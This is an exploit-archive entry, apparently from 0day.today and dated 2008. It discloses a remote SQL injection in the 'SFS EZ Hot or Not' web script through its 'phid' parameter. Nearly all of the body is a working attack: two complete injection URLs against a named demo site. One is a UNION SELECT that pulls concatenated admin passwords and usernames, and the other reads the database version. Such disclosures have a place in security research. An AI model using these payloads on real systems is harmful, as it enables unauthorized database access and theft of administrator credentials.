SFS EZ Hot or Not (phid) Remote SQL Injection Vulnerability

2008-10-31T00:00:00
ID 1337DAY-ID-3996
Type zdt
Reporter d3b4g
Modified 2008-10-31T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
SFS EZ Hot or Not (phid) Remote SQL Injection Vulnerability
===========================================================


----------------------------------------------------------------
script : SFS EZ Hot ot Not 

script  :  http://www.scripts-for-sites.info

Risk : High

----------------------------------------------------------------

Discovered by : d3b4g

----------------------------------------------------------------
Exploit demo: http://www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,concat(password,username),3,4,5,6+from+admin/*


version: http: www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6/*
----------------------------------------------------------------



#  0day.today [2018-04-01]  #